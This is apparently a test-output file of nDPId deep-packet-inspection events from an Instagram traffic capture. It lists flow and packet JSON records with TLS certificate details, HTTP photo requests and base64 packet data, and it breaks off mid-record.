+01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1436720908719,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908719,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRgAAEABOq7AqABnwKgAZwMDAwcAAAAARQAAPLKEQABABvFRwKgAZ63CKBTA\/QG7ZKZcEQAAAACgAjkIlxQAAAIEBbQEAggKAAPulQAAAAABAwMG"} -02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprDfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942507,"pkt":"QPMIw47hABsv8H60CABFAAW+7YVAADkGAKFcejCKwKgAZwBQolpM7hj\/zhvj2IAQAkuefgAAAQEIClRk1HoAA\/vEM\/iaPUALhIFKAs5lHhGDDQh9Ri+cJ7IlO3+U+lz\/AJfyy4DxuV\/4P\/o+vmeH\/hNqoIELoODxfoOAIXO0PMXMPnHoxqeYBwGo8oxahQh6j0xfzNnmEda9CmYCeDSna\/qNrEPvGW50RvR5h7uG+kXcGOBC7BGEPlQE7Yj9VADdS1kT29D7gnk\/qeBFzA3CDCDhz3gqv7gHmWA5mGyOJepR4EJPDEPmPiCsftA0fdwDBLwVjxH\/APKX29LRhXxOnSI4Ih5PTBEwQnYqjD3MPs\/lmZehG\/8AA\/8AT9Hx6L7CfPoFCO57QQY24Pf04EGPxc98QOB6OuYRGOvzGux+sHlCW3CnI9H6gK1Ng5mdNzFbgAyRCbreGctT5jQZEPRP6hHkIS+\/zCBFmIuGjFqI5\/uEmVBMg4hgvEdvaB+4PuYjwpncLG\/tARaSCgOECnAbe4e1GCNFARmxVQDALDyR+IOzv5nsz8T3R9wgRZi+8GdC55PovxL0YHoYoPEbSjg1BB16Ln\/4Ec+hG4XhdQP\/AAj\/AMS6qDzBT7P5oVuK4jP\/AJHo+vQ7xerHEOB\/MJM94fCL+ohnTjGoAOagD3iFagB4f5QswHhzoMy9DME64+YwcJGH3EIGYuyBB\/nEZ7TiCoY8wSKYOu5S3H2g4tgD7wANpxRQzjSFNilH9hDgQM9sJvDWSNGHs+0x8CbLnF1CclwLoBlRBpI3BxPAqGmw4ykVAG2kgAoGHly28ROIeyXA2GoWBRqYf9ufUEBje0FkRrD+IQecxboE3AOv7hC5gHugOOCfdiAGoheJXCdB6Ed+p6M6LnkF\/wDE\/UhuA8wf1fzRQdReggNdvURGX6gnc9o44SIJ4hEESg55h9ABOXCdAKBoAFARRJEzn9QkfZAdHcCZJ+0IfM82YFNwK2Mw9qjfbgB0alLX9QhRGT8SvaFD494T\/MQk8fqbOERdBBwkdmvmWKJzcwHIfLgJbfaBYGFByYLxbUA8zSMwDgeEJIj+oTwQfxK2SqgEvgPeFbIcbVX7KFvlB0KE87hYZQPRwPeH6uPhbjHBiWw7nL\/pnZCDnKByYHCBX5hgfMf3hZBZhDmz8QG7Sft6CPUI8RE4GpvB6ATxO3ovP\/jgJ7wEhHscGHx\/KuIHYBmYYPQqqng7Ew+z+eE4MfX\/AIH\/AIC6cAjiPoYHoIzU95cXVxsDhHD1AhE8T+IY4OoOZmio9RCbH6gBuoGYHNqg6GxAMRoQsrcD5h\/xiG2xCYJgDAIuFMDMWQBiwOT8QxkaQi4CCaSgP+GHg7nfnqF6wY1vXxCXqouAITzC5A3GyRRmF3HmjA9oXEGuJ4Jq1PKGF\/7E95xsZ1BT9jB0SPvOduIB7RHP\/I2Kh0kBNLD6MJz\/AJxbQj\/cwB4GCtzsgKZoQlqFxuEQHvc\/HoBi7iniEcIXcEEJgK9QOtGCOFaheFFdZ+3oP5CQaM\/4fzxGF7M4WoAHGX69x7j9FCP\/AB2jTxue8EBOF7EXZxDcScHjmEuIzgiYdDA4gRRtmHoJ56mwKX8F7wmCMfSKDe0XnQmaYuEnIC1Mc2QAHUVdCAtCh95n5imGNgyjyD5nfMLuXxBSoSDA8yxX\/E2oKG5iGgBLzCfMJ8wOCHsTPCecIsrQDCihrgix+Z7lA8uF2\/cOhJ+kLZAhOzHsR5iHYfYwUTAf3AWIwicr0HmfKhO7a+IxmwhfEE4GEoYUcHmODzCekU8+jhiigMf\/AMP\/AC\/+CLkzo9Jgh9HB5hJiiiPP\/m\/QDF7gHoYUsRjU4ATF9pWVBkA54Qk7j4h1hQB0nyIzIr0gCl4cXcIPGA8E49oZ0qhZBz7QqP8AqAKhDWgfxPgD+8p7uAtmJgK+HmA8sQ2B+ggN5gCPfcBNIz9YSgzZ9hABBp2CMzM="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1436720942508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720942508,"pkt":"ABsv8H60QPMIw47hCABFAAA0JelAAEAGxsfAqABnXHowiqJaAFDOG+PYTO4eiYAQH+pOOgAAAQEICgAD+8dUZNR5"} -02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="} -02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPV